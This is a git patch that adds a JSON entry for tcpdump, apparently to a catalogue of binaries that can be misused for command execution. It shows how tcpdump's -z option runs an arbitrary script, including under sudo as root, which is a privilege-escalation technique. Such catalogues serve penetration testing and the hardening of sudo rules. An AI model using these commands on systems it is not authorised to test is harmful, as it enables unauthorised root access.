From 197b720be0bebefbe5aa32b8b276e3516fbb7ea5 Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 13:14:24 +0100
Subject: [PATCH] add data for tcpdump

---
 data/tcpdump.json | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100644 data/tcpdump.json

diff --git a/data/tcpdump.json b/data/tcpdump.json
new file mode 100644
index 0000000..7d6d0e1
--- /dev/null
+++ b/data/tcpdump.json
@@ -0,0 +1,15 @@
+{
+  "description": "These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the 'postrotate-command' to a small subset of predefined commands thus preventing the execution of the following.",
+  "functions": {
+    "command": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root\n"
+      }
+    ]
+  }
+}
\ No newline at end of file